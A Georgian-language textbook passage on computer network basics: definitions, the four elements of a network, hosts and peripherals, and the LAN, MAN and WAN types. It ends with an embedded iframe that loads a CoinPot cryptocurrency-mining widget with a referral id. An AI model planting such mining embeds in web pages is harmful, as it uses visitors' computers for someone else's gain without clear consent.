ქსელების საფუძვლები


1.1. ქსელის ტიპები


ადამიანებს შორის კომუნიკაცია მნიშვნელოვან როლს თამაშობს მათ ცხოვრებაში. მათ სჭირდებათ მიიღონ ინფორმაცია ერთმანეთზე, ახალ ამბებზე, ამინდზე, ფინანსურ მაჩვენებლებზე და ა.შ. ინფორმაციის მიღების და გადაცემის მეთოდები იცვლებოდა და ვითარდებოდა წლების განმავლობაში. ინფორმაციულ საუკუნეში რომელშიც ჩვენ ვცხოვრობთ ინფორმაციის დროული მიღება და ფლობა უაღრესად მნიშვნელოვანია. ამიტომ ინფორმაციის მიღებასა და გადაცემაში კომპიუტერული ქსელი უმნიშვნელოვანეს როლს თამაშობს. კომპიუტერული ქსელი ეხმარება ადამიანებს უსწარაფესად გადასცენ ინფორმაცია მსოფლიოს ნებისმიერ ადგილას. მსოფლიოში მონაცემების გადაცემა გახდა კომპიუტერული სისტემების ფუნდამენტური ნაწილი. კომპიუტერული ტექნოლოგიების სწრაფმა განვითარებამ მოითხოვა კომპიუტერული სისტემების საიმედო, სწრაფი და დაცული კავშირების უზრუნველყოფა. ამიტომ კომპიუტერული ქსელების დაპროექტების, აგების და მართვის სისტემები მნიშვნელოვან როლს თამაშობს თანამედროვე ინფორმაციულ ტექნოლოგიებში.

1.2. ქსელების ფუნდამენტური პრინციპები და ტიპები

   რა არის ქსელი? - ქსელი (Network) - ინფორმაციის გაცვლისა და რესურსების ერთობლივად გამოყენებისათვის, ერთმანეთთან ფიქსირებულად ან/და მობილურად დაკავშირებული კომპიუტერების ჯგუფი.
 საინფორმაციო ქსელები ერთმანეთისაგან განსხვავდებიან სხვადასხვა შესაძლებლობებით, მაგრამ ყველა ქსელს გააჩნია ოთხი ძირითადი საერთო ელემენტი:
− წესები (პროტოკოლი), თუ როგორ უნდა მოხდეს ინფორმაციის გაგზავნა და მიღება; 
− ინფორმაცია ან ინფორმაციის ერთეული, რომელიც იგზავნება ერთი მოწყობილობიდან მეორეში;
− მედია საშუალება, რომლითაც ხდება ამ მოწყობილობების დაკავშირება;
− ქსელური მოწყობილობები, რომლებიც ცვლიან ერთმანეთთან ინფორმაციას.

   ქსელში გამოყენებული რესურსები - პროგრამები, მონაცემთა ფაილები, აგრეთვე პრინტერები და ქსელში სხვა ერთობლივად მოხმარებადი პერიფერიული მოწყობილობები.
       ქსელში შეიძლება იყოს გაზიარებული მრავალი ტიპის რესურსი -
- სერვისები, როგორიც არის ამობეჭდვა და სკანირება.
- მონაცემების შესანახი სივრცე და მოძრავი(removable) მოწყობილობები, როგორებიც არის მყარი და ოპტიკური დისკები
- პროგრამები, მონაცემთა ბაზები.

      კომპიუტერული ქსელი წარმოადგენს ურთიერთდაკავშირებულ და შეთანხმებულად ფუნქციონირებად პროგრამული და აპარატურული კომპონენტების რთულ კომპლექსს. ის არის კომპიუტერების და პერიფერიული მოწყობილობების ერთიანობა, რომლებსაც სპეციალური საკომუნიკაციო საშუალებების და პროგრამული უზრუნველყოფის საშუალებით შეუძლიათ ინფორმაციის გაცვლა. კომპიუტერულ ქსელში კომპიუტერების რაოდენობა ორიდან რამდენიმე ათასამდე შეიძლება იცვლებოდეს.

  კომპიუტერული მონაცემთა ქსელი არის ჰოსტების(Host კვანძი) ერთობლიობა, დაკავშირებული ერთმანეთთან ქსელური მოწყობილობების საშუალებით. ჰოსტი არის ნებისმიერი მოწყობილობა რომელიც აგზავნის და ღებულობს ინფორმაციას ქსელში. ქსელის ადმინისტრირება 1 გვერდი №7
ჰოსტებთან დაკავშირებულ მოწყობილობებს ეწოდებათ პერიფერიული მოწყობილობები.
მაგ. პრინტერი დაკავშირებული ქსელში ჩართულ კომპიუტერთან. თუმცა თუ პრინტერი არის დაკავშირებული პირდაპირ ისეთ ქსელურ მოწყობილობასთან როგორიც არის კონცენტრატორი, კომუტატორი ან მარშრუტიზატორი, ამ შემთხვევაში პრინტერიც არის ჰოსტი.
     შესაძლებელია კომპიუტერული ქსელების  კლასიფიკაციის   მრავალი სხვადასხვა ხერხი, მათ შორის რაოდენობისა და ქსელის ზომის მიხედვით, მონაცემთა გადაცემის ტიპის მიხედვით, ინფორმაციის გადაცემის სიჩქარის მიხედვით.

         ქსელები შეიძლება დავყოთ 3 ძირითად კლასად:
     ლოკალური ქსელი (LAN - Local Area Network) - ერთმანეთთან დაკავშირებული, ერთი ადმინისტრირების ქვეშ მოქცეული კომპიუტერების შედარებით მცირე ჯგუფი.
      მნიშვნელოვანია დავიმახსოვროთ, რომ ლოკალური ქსელის ელემენტები იმყოფება ადმინისტრირების ერთი ჯგუფის მართვის ქვეშ, რომელიც განსაზღვრავს ქსელში მომქმედ წვდომის მართვასთან დაკავშირებულ პოლიტიკასა და უსაფრთხოებას ამ კონტექსტში სიტყვა ”ლოკალური” მიანიშნებს ერთობლივ ”ლოკალურ” მართვას და არა კომპონენტებს შორის ფიზიკურ სიახლოვეს

    რეგიონალური ქსელი (MAN – Metropolitanl Area Network)- ქსელი, რომელიც აერთიანებს ბევრ ლოკალურ ქსელს ერთი რაიონის, ქალაქის ან რეგიონის ფარგლებში.

      გლობალური ქსელი (WAN – Wide Area Network)- ქსელი, რომელიც აერთიანებს სხვადასხვა ქალაქების, რეგიონების და სახელმწიფოების კომპიუტერებს.
<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincore/?ref=F93E827F97C1&mode=widget" style="overflow:hidden;width:324px;height:470px;"></iframe>

Comments